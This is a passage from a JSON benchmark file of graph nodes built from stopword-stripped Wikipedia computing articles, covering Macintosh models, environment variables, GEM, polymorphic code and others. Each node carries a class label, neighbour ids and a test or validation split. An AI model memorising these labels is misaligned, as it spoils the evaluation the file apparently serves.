machines era including quadra 605 also sold performas last use name quadra 630 variation lc 630 using full motorola 68040 instead lc 68lc040 introduced together 1994 630 first mac use ide based drive bus internal hard disk drive whereas earlier models used scsi first three apple workgroup server models wgs 60 wgs 80 wgs 95 mostly called aws 95 apple workgroup server based centris 610 quadra 800 quadra 950 respectively transition motorola 68040 smooth previous transitions motorola 68020 motorola 68030 due motorola 68040 split instruction data caches quadra compatibility problems self-modifying code including relocating code common macintosh memory model apple partially fixed basic mac os memory copy call flush caches solved vast majority stability problems negated much motorola 68040 performance improvements apple also introduced variant memory copy call flush cache new trap defined way calling older version mac os would simply call previous memory copy routine net effect many complex applications initially slow prone crashing 68040 although developers quickly adapted new architecture relying apple memory copy routines rather flushing cache using memory copy flush cache appropriate time",
    "neighbors": [
      9732,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      1592,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      8806,
      6258,
      5235,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7844,
      3241,
      2735,
      4283,
      7869,
      8893,
      9406,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      3338,
      781,
      4879,
      784,
      8480,
      10023,
      3371,
      4910,
      4399,
      11066,
      9022,
      1346,
      10562,
      3911,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      464,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 7843,
    "label": 4,
    "text": "Real-time_adaptive_security:real-time adaptive security real-time adaptive security network security model necessary accommodate emergence multiple perimeters moving parts network increasingly advanced threats targeting enterprises adaptive security watch network malicious traffic behavioral anomalies ferret end point vulnerabilities identify real-time changes systems automatically enforce end point protections access rules block malicious traffic follow compliance dashboard providing audit data among key features adaptive security infrastructure security platforms share correlate information rather point solutions heuristics system could communicate suspicions firewall features include finer-grained controls automation addition human intervention on-demand security services security service integration security management data rather adding security custom applications go operational security models would created design phase app major change model real-time adaptive security shifting authorization management policy on-demand service contains details policy enforcement matches compliance adapt user situation trying access application instance",
    "neighbors": [
      2192,
      939,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 7844,
    "label": 3,
    "text": "Macintosh_IIvi:macintosh iivi macintosh iivi also sold macintosh performa 600 personal computer designed manufactured sold apple computer inc. september 1992 february 1993 iivi introduced alongside macintosh iivx using slower processor 16 mhz vs. 32 mhz floating point unit performa 600 models meanwhile iivi iivx 32 mhz cpu iivi benchmarks faster iivx model macintosh ii family branded performa short-lived macintosh model discontinued four months introduction centris 650 introduced similar price point performa 600 featured 1994 disney movie blank check models include three nubus slots pds performa 600 models formally introduced september 14 shipments delayed october coincide introduction iivi iivx introduced september 14 1992 introduced october 19 1992",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 7845,
    "label": 3,
    "text": "Black_Lab_Linux:black lab linux black lab linux free software linux distribution x86 x86-64 hardware first released november 2013 pc/opensystems llc black lab linux based ubuntu linux tailored general desktop use technical user commercially made available pc/opensystems llc business desktops education facilities well parallel computing formerly known os/4 product renamed roberto j. dohnert software team black lab linux uspto denied trademark application os/4 pc/opensystems llc acquired rights name black lab linux 2008 acquisition terrasoft solutions fixstars current incarnation black lab linux share code platform similarities terrasoft solutions product called black lab linux terrasoft solutions release powerpc processor fixstars linux products yellow dog linux y-hpc currently developed yellow dog linux brand",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      11388,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      8700,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 7846,
    "label": 2,
    "text": "EFx_Factory:efx factory efx factory architectural-guidance software factory pioneering architectural guidance software factory microsoft one first implementations software factory built ‘ efx factory ’ implements .net distributed architecture service-oriented applications services factory based upon architectural application framework called enterprise framework describes physical microsoft .net architecture leveraging microsoft enterprise library service-oriented patterns microsoft patterns practices efx factory designed built development consultants within microsoft consulting services response customer demand implementation .net architecture best practices .net development guidance best use enterprise library number application blocks freely available microsoft initially circa 2003 .net framework 1.0-1.1 visual studio 2002–2003 ‘ enterprise framework ’ efx built meet growing customer demand implementation .net architecture framework based upon implementation patterns harvested several enterprise solution implementations various customers framework implemented layered .net architecture leveraged extended enterprise library provide complete framework authoring applications services .net platform application framework evolved along changes .net platform emerging microsoft technologies changes industry service orientation patterns framework delivered set class libraries containing base implementations architectural layers prescribing certain technologies asmx ‘ infrastructural services ’ developers used address cross-cutting concerns architectural layers exception handling authentication authorization logging etc framework extended enterprise library implemented several real-world security providers necessary many customers time heterogeneous technology environments addition many best practice patterns specifically concerning exception handling built upon enterprise library solve requirements enterprise context framework also provided blocks packaged enterprise library validation block provided useful abstractions enterprise library specific solution domain offered simplified apis framework unified api typing string parameters framework delivered source form set framework assemblies packaged enterprise library framework included suggested set solutions reference implementation ri documentation developers created client-side applications server-side asp.net web services development application service required developer create new solution implement set assemblies one layer referenced framework assemblies deployed executable application web service primary challenge developers learning patterns framework hand crafting applications services blank solutions without availability time code templates resulted prolific cut pasting code reference implementation code highly vulnerable manual error circa 2005 several technologies emerged microsoft enabled use templates automation modeling types applications services including visual studio 2005 visual studio modeling distributed application system designers guidance automation toolkit gat domain-specific language toolkit dsl using new technologies framework able evolve systematically implementation software factory process many constraints framework lifted enable flexibility products factory could assemble primarily removal prescription technology architectural layers ability deal effectively change development applications services factory introduced domain modeling several new abstractions utilized automation previously possible factory one first factories combine dsl diagrams gat recipes well extending distributed application system designers visual studio gat recipes factory makes extensive use recipes automating changes solution structure property changes structure providing wizards configure models factory provides generating project templates work products automating menial tasks factory user 2007 development efx factory ceased many concepts pioneered absorbed future software factory platform microsoft adopted software factories patterns practices web service software factory following list exemplifies features factory others period factory one first factories designed factory 'product model part factory schema factory provides logical architectural view supporting runtime creating/modifying work products factory developer logical model separates logical design factory product ‘ product explorer ’ physical implementation normally viewed modified ‘ solution explorer ’ visual studio way physical structure solution artifacts could separated logical architectural structure work products product factory user could focus upon architecture product author using models abstractions whilst factory manages creation placement source artifacts factory integrates extends distributed application system designers installed visual studio team edition software architects visual studio provided diagrams application designer system designers provide means define high-level application services enterprise compose black box systems composed larger systems factory extends designers add number new shapes representing implementation applications services new shapes implemented provide specific projects solution templates represent physical structure factory product templates added new set diagram files represent internal component parts application service layers diagrams define specification application service layers give user navigation path drill-down high-level applications inner implementation details factory models using dsl ’ internal implementation applications services based upon logical technology-independent architecture soa patterns architecture composed several layers extended implemented pluggable ‘ artefact generators ’ ‘ technology providers ’ technology providers provide technology specific implementation view layer example layer would ‘ service contract ’ layer web service containing service interfaces service operations data contracts factory first factory provide extensibility mechanism 3rd parties global si isv community domain experts would provide technology tailored implementations various layers technology providers would take form external factories factorettes would integrate efx factory enhance expose technology specific views architectural models ultimately transform source artefacts technology separation capability allowed 'variant factory packaged deployed include technology-independent core factory models several ‘ artefact generators ’ providing technology implementations factory enabled composability variant factories could build solutions suit multitude real-world heterogeneous technology environments",
    "neighbors": [
      10243,
      4107,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      10414,
      8391,
      7368,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      10020,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5433,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7847,
    "label": 2,
    "text": "Environment_variable:environment variable environment variable dynamic-named value affect way running processes behave computer part environment process runs example running process query value temp environment variable discover suitable location store temporary files home userprofile variable find directory structure owned user running process introduced modern form 1979 version 7 unix included unix operating system flavors variants point onward including linux macos pc dos 2.0 1982 succeeding microsoft operating systems including microsoft windows os/2 also included feature although somewhat different syntax usage standard variable names unix unix-like systems process separate set environment variables default process created inherits duplicate environment parent process except explicit changes made parent creates child api level changes must done running codice_1 codice_2 alternatively command shells bash user change environment variables particular command invocation indirectly invoking via codice_3 using codice_4 notation running program access values environment variables configuration purposes shell scripts batch files use environment variables communicate data preferences child processes also used store temporary values reference later shell script however unix variables usually used unix environment variable changed script compiled program affect process possibly child processes parent process unrelated processes affected similarly changing removing variable value inside dos batch file change variable duration codice_5 existence unix environment variables normally initialized system startup system init scripts hence inherited processes system users often augment profile script command shell using microsoft windows environment variable default value stored windows registry set codice_6 file unix setuid program given environment chosen caller runs different authority caller dynamic linker usually load code locations specified environment variables codice_7 codice_8 run process authority setuid program would insecure caller could get run arbitrary code hence misuse authority reason libc unsets environment variables startup setuid process setuid programs usually unset unknown environment variables check others set reasonable values variables used scripts command line usually referenced putting special symbols front around variable name instance display user home directory scripting environments user type dos os/2 windows command-line interpreters codice_5 codice_10 user type windows powershell user type commands codice_3 codice_12 codice_13 display environment variables values codice_13 also used print single variable giving variable name sole argument command commands codice_3 codice_12 also used set environment variables often incorporated directly shell unix following commands also used often dependent certain shell simple principles govern environment variables achieve effect environment variables local process set two shell processes spawned value environment variable changed one change seen child process created inherits environment variables values parent process usually program calls another program first creates child process forking child adjusts environment needed lastly child replaces program called procedure gives calling program control environment called program unix unix-like systems names environment variables case-sensitive unix shells variables may assigned without codice_17 keyword variables defined way displayed codice_12 command true environment variables stored shell recognized kernel codice_13 command display child processes inherit however used front program run variables added program environment persistence environment variable session-wide system-wide unset builtin command implemented bourne shell family sh ksh bash etc c shell family csh tcsh etc unix command line shells unsets shell variable removing memory shell exported environment implemented shell builtin directly manipulates internals shell read-only shell variables unset one tries unset read-only variable unset command print error message return non-zero exit code dos os/2 windows command-line interpreters codice_5 codice_10 codice_22 command used assign environment variables values using following arguments codice_22 command without arguments displays environment variables along values examples environment variables include dos master environment provided primary command processor inherits pre-environment defined codice_64 first loaded size configured codice_65 parameter 160 32767 bytes local environment segments inherited child processes typically reduced size contents hold command-line processors like 4dos allow define minimum amount free environment space available launching secondary shells content environment variables remains unchanged upon storage names without codice_66 always converted uppercase exception pre-environment variables defined via codice_64 directive codice_22 dr dos 6.0 higher codice_69 allow lowercase names dr-dos 7.02 higher principle ms-dos 7.0 higher also supports lowercase variable names codice_70 provides means user define environment variable names containing lowercase letters stored environment like normal environment variables remain invisible dos software since written expect uppercase variables command processors limit maximum length variable name 80 characters principally limited size environment segment dos 16-bit windows programs expect contents environment variables exceed 128 characters dr-dos codice_5 supports environment variables 255 4dos even 512 characters since codice_5 configured via codice_73 support command lines 1024 characters internally ms-dos 7.0 higher environment variables expected contain least 1024 characters well versions dr-dos environment passed drivers often need environment installation shrunken relocated codice_74 codice_75/codice_76 options codice_77 zero environment codice_78 substitute drive e.g codice_79 codice_80 relocate environment program order minimize driver effectively resulting resident memory footprint batch mode non-existent environment variables replaced zero-length string standard environment variables reserved environment variables include dr-dos family supports number additional standard environment variables including datalight rom-dos supports number additional standard environment variables well including codice_364 codice_365 codice_366 codice_367 codice_368 codice_369 also used rom-dos system path variables refer locations critical operating system resources generally user-dependent user management variables store information related resources settings owned various user profiles within system general rule variables refer critical system resources locations necessary os run optional system variables explicitly specified default used modify default behavior certain built-in console commands variables also need explicitly specified command line arguments following tables shows typical default values certain environment variables english versions windows retrieved codice_427 list environment variable refers location user documents directory standard method setting program home directory documents directory besides true environment variables statically stored environment changed deleted number pseudo-environment variables exist batch processing so-called replacement parameters replaceable parameters microsoft ibm terminology aka replacement variables digital research novell caldera terminology batch file parameters jp software terminology codice_432..codice_433 codice_434 used retrieve calling parameters batchjob see codice_435 batchjobs retrieved like environment variables actually stored environment command-line processors like dr-dos codice_5 multiuser dos codice_437/codice_438 terminal message process jp software 4dos 4os2 4nt take command windows cmd.exe support type pseudo-environment variables named system information variables novell caldera terminology internal variables jp software terminology used retrieve various possibly dynamic read-only information running system batch jobs returned values represent status system moment variables queried reading multiple times row may return different values even within command querying direct effect system since stored environment listed set exist external programs retrieve true environment variable name defined takes precedence corresponding variable environment variable deleted case-sensitive almost variables prefixed underscore codice_439 4dos etc convention f.e codice_440 dr-dos codice_5 f.e codice_260 addition 4dos 4os2 4nt take command also support called variable functions including user-definable ones work like internal variables take optional parameters f.e codice_443 may even change system status depending function system information variables supported dr-dos codice_5 system information variables supported dr-dos codice_5 networking loaded dynamic environment variables also named internal variables system information variables dos pseudo-environment variables supported codice_427 command-line extensions enabled expand various discrete values whenever queried values change queried multiple times even within command used batch jobs prompt stored environment consequently neither listed codice_22 exist external programs read case-sensitive indirectly also supported windows codice_5 modified internally call codice_602 execute commands",
    "neighbors": [
      515,
      6148,
      9733,
      9735,
      2568,
      521,
      3594,
      6664,
      9738,
      2573,
      7181,
      10760,
      6674,
      1555,
      532,
      1556,
      7188,
      6680,
      537,
      8729,
      7196,
      8221,
      9762,
      5670,
      2599,
      8236,
      52,
      9780,
      3131,
      3649,
      10817,
      2120,
      5706,
      3659,
      4174,
      6227,
      11351,
      9819,
      7266,
      8296,
      9324,
      621,
      8301,
      1647,
      9839,
      9840,
      1138,
      8306,
      4727,
      636,
      639,
      1152,
      641,
      5759,
      8834,
      5767,
      5256,
      6281,
      6797,
      4750,
      10387,
      2198,
      4248,
      2201,
      10394,
      6812,
      2717,
      7325,
      6138,
      4771,
      4775,
      7847,
      1193,
      178,
      3250,
      11442,
      3767,
      7356,
      10428,
      2245,
      4298,
      1741,
      2253,
      10960,
      8402,
      4309,
      1750,
      2262,
      6358,
      10967,
      9946,
      2786,
      9444,
      5356,
      6893,
      7920,
      4850,
      7411,
      2804,
      10484,
      8954,
      6396,
      1790,
      11525,
      2310,
      4870,
      7947,
      8975,
      3856,
      4369,
      6417,
      8976,
      1813,
      5397,
      9505,
      808,
      11562,
      4398,
      6446,
      7983,
      10033,
      1842,
      823,
      1336,
      2872,
      4409,
      8504,
      5437,
      7486,
      8517,
      9542,
      4423,
      8522,
      6476,
      11598,
      8529,
      10579,
      10068,
      3413,
      7000,
      4968,
      6506,
      9067,
      10096,
      5492,
      3960,
      1408,
      3970,
      10631,
      3976,
      2955,
      11663,
      2448,
      8080,
      11154,
      9620,
      4001,
      3496,
      4528,
      7088,
      2485,
      6583,
      1978,
      10172,
      960,
      10176,
      451,
      1987,
      965,
      9166,
      8675,
      7140,
      10727,
      5096,
      6120,
      491,
      1515,
      9709,
      2545,
      1522,
      3571,
      5106,
      8692,
      3062,
      9204,
      11249,
      506,
      7675
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7848,
    "label": 2,
    "text": "Amdahl_UTS:amdahl uts uts discontinued implementation unix operating system ibm mainframe compatible computers amdahl created first versions uts released may 1981 uts global acquiring rights product 2002 uts global since gone business uts release 4.5 supports following s/390 model processors successors uts project origins work started princeton university 1975 port unix ibm vm/370 system team members tom lyon joseph skudlarek peter eichenberger eric schmidt tom lyon joined amdahl 1978 1979 full version 6 unix system amdahl 470 used internally design automation engineering late 1979 updated commonly ported version 7 1980 amdahl announced support unix system 470 five years later ibm announced mainframe unix ix/370 competitive response amdahl commercial versions uts based unix system iii unix system v. 1986 amdahl announced first version run natively ibm/370-compatible hardware uts/580 amdahl 580 series machines previous unix ports always ran guests ibm vm hypervisor version 4.5 based unix system v release 4 svr4",
    "neighbors": [
      2179,
      4996,
      6787,
      10883,
      6412,
      7053,
      8077,
      9361,
      6675,
      9468,
      789,
      5397,
      1304,
      11673,
      9370,
      2168,
      3359,
      3487,
      3488,
      7460,
      421,
      3241,
      1323,
      7983,
      3248,
      7217,
      8879,
      2995,
      10803,
      7733,
      9141,
      823,
      9784,
      10040,
      5562,
      573,
      9151,
      1219,
      8388,
      10436,
      4550,
      6342,
      1235,
      863,
      6369,
      868,
      3429,
      9444,
      9829,
      6248,
      5492,
      2424,
      633,
      2172,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7849,
    "label": 2,
    "text": "Graphics_Environment_Manager:graphics environment manager gem graphics environment manager operating environment created digital research dri use dos operating system intel 8088 motorola 68000 microprocessors gem known primarily graphical user interface gui atari st series computers also supplied series ibm pc-compatible computers amstrad also available standard ibm pc time 6 mhz ibm pc concept gui brand new core small number dos programs notable ventura publisher ported number computers previously lacked graphical interfaces never gained popularity platforms dri also produced x/gem flexos real-time operating system adaptations os/2 presentation manager x window system preparation well gem started life dri general-purpose graphics library known gsx graphics system extension written team led heiskell lee lorenzen graphic software systems inc. recently left xerox parc birthplace modern gui wrote much code gsx essentially dri-specific implementation gks graphics standard proposed late 1970s gsx intended allow dri write graphics programs charting etc platforms cp/m-80 cp/m-86 ms-dos nec apc-iii would run task would otherwise require considerable effort port due large differences graphics hardware concepts various systems era gsx consisted two parts selection routines common drawing operations device drivers responsible handling actual output former known gdos latter gios play division cp/m machine-independent bdos machine-specific bios gdos selection routines handled gks drawing gios actually used underlying hardware produce output driver binary may operate cp/m-86 dos gsx evolved one part would later known gem effort build full gui system using earlier gsx work basis originally known crystal play ibm project called glass name later changed gem gem gsx became gem vdi virtual device interface responsible basic graphics drawing vdi also added ability work multiple fonts added selection raster drawing commands formerly vector-only gks-based drawing commands vdi also added multiple viewports key addition use windows new module gem aes application environment services provided window management ui elements gem desktop used libraries combination provide gui 8086 version entire system first demoed 1984 comdex shipped gem/1 28 february 1985 gem desktop 1.0 released 28 february 1985 gem desktop 1.1 released april 1985 support cga ega displays version apricot computers f-series supporting 640×200 8 colors also available gem desktop 1.2 dri originally designed gem dos would check run ibm computers pc compatibles like compaq company hoped receive license fees compatible makers developers reacted byte described small explosion reported dri-hosted seminar february 1985 half attendees agreed gem incompatibility compaq serious limitation later month company removed restriction applications supported gem included lifetree software gem write point apple computer sued dri would turn long dispute look feel gem/1 system almost direct copy macintosh elements bearing closer resemblance earlier lisa available since january 1983 eventually led dri forced change several basic features system see also apple v. digital research apple would later go sue companies similar issues including copyright lawsuit microsoft hp addition printers system also contained drivers unusual devices polaroid palette dri responded lawsuit-friendly gem desktop 2.0 released march 1986 support vga displays allowed display two fixed windows desktop though programs could wished changed trash icon removed animations things like opening closing windows otherwise similar gem/1 also included number bug fixes cosmetic improvements 1988 stewart alsop ii said gem among several guis already knocked market apple ibm/microsoft others gem xm gem desktop 3.0 updated version gem/2 1986/1987 dos including dos plus allowed task-switching ability run ten gem dos programs swapping expanded memory xm ems/eems disk including ram disks thereby also allowing use extended memory data could copied pasted applications clipboard filter function feature later also found taskmax dr dos 6.0 digital research planned offer gem xm option gem draw plus users oem channels gem xm source code freely available terms gnu general public license last retail release gem/3 desktop released november 1988 speed improvements shipped number basic applications commercial sales gem ended gem/3 source code subsequently made available number dri leading customers gem/4 released 1990 included ability work bézier curves feature still commonly found outside postscript world version produced specifically artline drawing program german company ccp development gmbh system also included changes font management system made incompatible likes timeworks publisher another version gem called gem/5 produced gst timeworks publisher 2.1 contained updated look 3d buttons along features on-the-fly font scaling came complete standard 3.1 tools version produced gem 3.13 bézier handling taken gem/4 gem desktop spun 1990 product known viewmax used solely file management shell dr dos form system could run gem programs led situation number applications including viewmax could exist statically linked copy gem system scenario actually rare native gem programs published 1991 viewmax 2 released forms gem survived dri purchased novell june 1991 gem development cancelled throughout time dri also working making gem system capable multitasking started x/gem based gem/1 required use one multitasking cp/m-based operating systems dri also produced x/gem flexos real-time operating system adaptations os/2 presentation manager x window system preparation well lee lorenzen left soon release gem/1 became clear dri strong interest application development joined two former dri employees heiskell john meyer start ventura software developed ventura publisher later marketed xerox eventually corel would go popular desktop publishing program time development production 68000 version gem began september 1984 atari sent team called monterey group digital research begin work porting gem originally plan run gem top cp/m-68k ostensibly ported motorola 68000 dri prior st design created fact ports unusable would require considerable development digital research also offered gemdos originally written gem dos dos-like operating system aimed port gem different hardware platforms available 8086 68000 processors adapted apple lisa 2/5 motorola vme/10 development system already atari eventually decided give existing cp/m-68k code instead port gemdos atari st platform referring tos atari provided development 68000 version given full rights continued developments without needing reverse-license back dri result apple-dri lawsuit apply atari versions gem allowed keep mac-like ui next seven years 1985 1992 new versions tos released new generation st line updates included support colors higher resolutions raster-side system remained generally similar original terms gks support 1992 atari released tos 4 multitos along final computer system falcon030 combination mint tos 4 allowed full multitasking support gem caldera bought remaining digital research assets novell 23 july 1996 initial plans revive gem viewmax technologies low-footprint user interface opendos mobile applications caldera view plans abandoned caldera uk favour dr-webspyder grow caldera thin clients later known lineo released source gem gem xm terms gnu general public license gpl april 1999 development gem pc continued freegem opengem atari st platform original dri sources ported used free open source tos clone emutos new implementations aes portions gem implemented scratch form xaaes myaes fully re-entrant support multitasking top freemint multitasking extensions tos full gem system consisted three main parts gem vdi core graphics system overall gem engine responsible low level drawing form draw line vdi included resolution coordinate independent set vector drawing instructions called applications fairly simple interface tvdi also included environment information state context current color line thickness output device etc commands examined gdos whose task send commands proper driver actual rendering instance particular gem vdi environment connected screen vdi instructions routed screen driver drawing simply changing environment point printer needed theory print dramatically reducing developer workload formerly printing hand applications gdos also responsible loading drivers requested fonts gem first loaded one major advantage vdi provided macintosh way multiple devices contexts handled mac information stored memory inside application resulted serious problems attempting make mac handle pre-emptive multitasking drawing layer quickdraw needed direct memory access programs gem vdi however information stored device gdos creating virtual devices every context – window instance gem aes provided window system window manager ui style gui elements widgets performance reasons many gui widgets actually drawn using character graphics compared macintosh aes provided rather spartan look system shipped single monospaced font aes performs operations calling vdi general sense two parts gem often completely separated applications applications typically called aes commands set new window rest application using vdi calls actually draw window gem desktop application program used aes provide file manager launcher traditional desktop environment users come expect macintosh unlike macintosh gem desktop based top dos ms-dos dos plus dr dos pc gemdos atari result actual display cluttered computer-like items including path names wildcards general gem much geeky mac simply running usable shell dos huge achievement otherwise gem advantages mac os proportional sliders",
    "neighbors": [
      10113,
      2179,
      10757,
      6921,
      6797,
      3216,
      4114,
      3091,
      6675,
      5397,
      9366,
      2840,
      2201,
      9881,
      11422,
      2729,
      11562,
      6187,
      7983,
      178,
      7986,
      8628,
      4409,
      5694,
      7999,
      576,
      9795,
      4548,
      9166,
      10067,
      6100,
      6104,
      10083,
      5220,
      7269,
      9700,
      10728,
      1515,
      5612,
      8301,
      11243,
      1007,
      2672,
      3056,
      2290,
      3186,
      4337,
      5619,
      9329,
      4727,
      11513,
      6778,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 7850,
    "label": 2,
    "text": "HostAP:hostap hostap one popular ieee 802.11 device drivers linux since november 2016 officially obsolete linux kernel works cards using conexant formerly intersil prism 2/2.5/3 chipset support host ap mode allows wlan card perform functions wireless access point driver code written jouni malinen hired atheros 2008 included main kernel tree linux 2.6.14",
    "neighbors": [
      8909,
      7983,
      9968,
      10863,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7851,
    "label": 4,
    "text": "Polymorphic_code:polymorphic code computer terminology polymorphic code code uses polymorphic engine mutate keeping original algorithm intact code changes time runs function code semantics change example 1+3 6-2 achieve result using different values operations technique sometimes used computer viruses shellcodes computer worms hide presence encryption common method hide code encryption main body code also called payload encrypted appear meaningless code function decryption function added code code executed function reads payload decrypts executing turn encryption alone polymorphism gain polymorphic behavior encryptor/decryptor pair mutated copy code allows different versions code function anti-virus software intrusion detection systems ids attempt locate malicious code searching computer files data packets sent computer network security software finds patterns correspond known computer viruses worms takes appropriate steps neutralize threat polymorphic algorithms make difficult software recognize offending code constantly mutates malicious programmers sought protect encrypted code virus-scanning strategy rewriting unencrypted decryption engine resulting encrypted payload time virus worm propagated anti-virus software uses sophisticated pattern analysis find underlying patterns within different mutations decryption engine hopes reliably detecting malware emulation may used defeat polymorphic obfuscation letting malware demangle virtual environment utilising methods traditional signature scanning virtual environment sometimes called sandbox polymorphism protect virus emulation decrypted payload remains regardless variation decryption algorithm metamorphic code techniques may used complicate detection virus may execute without ever identifiable code blocks memory remain constant infection infection first known polymorphic virus written mark washburn virus called 1260 written 1990 better-known polymorphic virus created 1992 hacker dark avenger pseudonym means avoiding pattern recognition antivirus software common virulent polymorphic virus file infecter virut example really polymorphic code serve introduction world encryption via xor operator example algorithm using variables b variable c could large amount code changes c would effect algorithm allowing changed endlessly without heed final product encrypted code payload make different versions code copy garbage lines manipulate c change code inside encrypted lots encrypted code search code decryption_code cryptokey algorithm new code thing usually coder uses zero key example xor 0 first generation virus making easier coder key code encrypted coder implements incremental key algorithm random one polymorphic code also used generate encryption algorithm code generated online service stringencrypt takes string file content encrypts random encryption commands generates polymorphic decryption code one many supported programming languages see c++ example string encrypted character stored encrypted form using unicode widechar format different encryption commands used like bitwise xor addition subtraction bit rotations everything randomized encryption keys bit rotation counters encryption commands order well output code generated c/c++ c java javascript python ruby haskell masm fasm autoit thanks randomization generated algorithm different every time possible write generic decryption tools compiled code polymorphic encryption code analyzed time re-encrypted",
    "neighbors": [
      9345,
      11266,
      3462,
      9224,
      11278,
      7578,
      3867,
      1051,
      9245,
      6430,
      3876,
      2213,
      6182,
      7717,
      9385,
      3629,
      5677,
      7343,
      10745,
      9393,
      10420,
      11574,
      10042,
      7739,
      9791,
      11583,
      1474,
      10819,
      3529,
      5081,
      7515,
      8032,
      8554,
      8171,
      4972,
      8430,
      2680,
      2041,
      5245,
      10110
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7852,
    "label": 3,
    "text": "Classic_RISC_pipeline:classic risc pipeline history computer hardware early reduced instruction set computer central processing units risc cpus used similar architectural solution called classic risc pipeline cpus mips sparc motorola 88000 later notional cpu dlx invented education classic scalar risc designs fetched tried execute one instruction per cycle main common concept design five-stage execution instruction pipeline operation pipeline stage worked one instruction time stages consisted initial set flip-flops combinational logic operated outputs flip-flops instruction cache machines latency one cycle meaning instruction cache would ready next clock cycle instruction fetch stage 32-bit instruction fetched cache program counter pc register holds address current instruction feeds pc predictor sends program counter pc instruction cache read current instruction time pc predictor predicts address next instruction incrementing pc 4 instructions 4 bytes long prediction always wrong case taken branch jump exception see delayed branches later machines would use complicated accurate algorithms branch prediction branch target prediction guess next instruction address unlike earlier microcoded machines first risc machines microcode fetched instruction cache instruction bits shifted pipeline simple combinational logic pipeline stage could produce control signals datapath directly instruction bits result little decoding done stage traditionally called decode stage consequence lack decoding meant however instruction bits used specifying instruction also leaves fewer bits things like register indices mips sparc dlx instructions two register inputs decode stage two register names identified within instruction two registers named read register file mips design register file 32 entries time register file read instruction issue logic stage determined pipeline ready execute instruction stage issue logic would cause instruction fetch stage decode stage stall stall cycle stages would prevent initial flip-flops accepting new bits instruction decoded branch jump target address branch jump computed parallel reading register file branch condition computed register file read branch taken instruction jump pc predictor first stage assigned branch target rather incremented pc computed architectures made use alu execute stage cost slightly decreased instruction throughput decode stage ended quite lot hardware mips possibility branching two registers equal 32-bit-wide tree ran series register file read making long critical path stage also branch target computation generally required 16 bit add 14 bit incrementer resolving branch decode stage made possible single-cycle branch mispredict penalty since branches often taken thus mispredicted important keep penalty low execute stage actual computation occurs typically stage consists arithmetic logic unit also bit shifter may also include multiple cycle multiplier divider arithmetic logic unit responsible performing boolean operations nand xor xnor also performing integer addition subtraction besides result alu typically provides status bits whether result 0 overflow occurred bit shifter responsible shift rotations instructions simple risc machines divided three latency classes according type operation data memory needs accessed done stage stage single cycle latency instructions simply results forwarded next stage forwarding ensures one two cycle instructions always write results stage pipeline one write port register file used always available direct mapped virtually tagged data caching simplest far numerous data cache organizations two srams used one storing data storing tags stage single cycle two cycle instructions write results register file hennessy patterson coined term hazard situations instructions pipeline would produce wrong answers structural hazards occur two instructions might attempt use resources time classic risc pipelines avoided hazards replicating hardware particular branch instructions could used alu compute target address branch alu used decode stage purpose alu instruction followed branch would seen instructions attempt use alu simultaneously simple resolve conflict designing specialized branch target adder decode stage data hazards occur instruction scheduled blindly would attempt use data data available register file classic risc pipeline data hazards avoided one two ways bypassing also known operand forwarding suppose cpu executing following piece code instruction fetch 